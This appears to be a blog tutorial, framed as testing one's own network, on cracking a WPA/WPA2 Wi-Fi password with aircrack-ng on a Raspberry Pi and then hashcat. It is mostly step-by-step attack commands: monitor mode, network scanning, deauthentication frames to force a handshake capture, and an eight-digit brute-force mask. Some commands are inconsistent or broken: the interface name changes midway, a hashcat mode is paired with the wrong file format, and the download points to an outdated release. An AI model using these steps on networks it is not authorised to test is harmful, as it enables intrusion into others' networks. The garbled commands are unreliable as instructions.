WiFi technology is used almost in every home and business. This is understandable, given how convenient internet connectivity becomes with WiFi. This convenience comes with a price, and that price is privacy. Since WiFi is wireless this means anyone within range of the router can eavesdrop on your connection and gain access to your network.
In this article, I want to teach you how to test your own network to see how easy it is to gain access to it.
In order to be able to perform this task, we need some SW and HW tools.
Raspberry Pi 3/4 running Raspberry OS
WiFi adaptor with monitor mode capabilities
Caputring a WPA/WPA2 Handshake
The handshake is a process in which the device and the router exchange keys that are used to encrypt the data and secure the connection.
We will make use of a penetration testing tool call Aircarck-ng.
Install Aircarck-ng on your Pi
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install aircrack-ngDiscover network interface on your system
sudo airmon-ngA list of the Wireless interfaces will show up
PHY Interface Driver Chipset
phy0 wlan0 brcmfmac Broadcom 43430
phy1 wlan1 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
In this example, we can see two wireless interfaces. wlan0 using Chipset by Broadcom and wlan1 using a chipset by Qualcomm.
We will use wlan1, since it has monitor mode capabilities.
To start monitor mode on wlan1 run the following command:
sudo airmon-ng start wlan1A virtual network device will be created, you can see the active interfaces with the following command
sudo iwconfignow we can monitor the surrounding for WiFi networks with the following command:
sudo airodump-ng wlan1mon --write SSID.txtSelect a network you wish to capture packets from. take the bssid and channel from the SSID.txt file.
sudo airodump-ng wlan0mon --output-format pcap --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01Now we will capture the WPA2-PSK Handshake by sending a re-authentication request.
On a separate terminal run the command to send 5 re-authentication requests
sudo aireplay-ng -0 5 -a F0:9F:C0:AA:6C:B8 wlan1monnow you can stop the capturing and the re-authentication requests
check if the handshake was captured
sudo aircrack-ng test01.capNow that you have the .cap file. you need to copy it to a machine that is capable of running hashcat to start cracking it.
Hashcat
We will use Hashcat to crack the password. Hashcat is an open source software used for password recovery.
To install Hashcat on windows, download the binaries from Hashcat website.
To install Hashcat on Linux run the following command
sudo apt-get install hashcat
or download the binaries
wget https://hashcat.net/files/hashcat-2.00.7z
To start the password recover run:
hashcat.exe -m 22000 -a 3 capture.hccapx ?d?d?d?d?d?d?d?d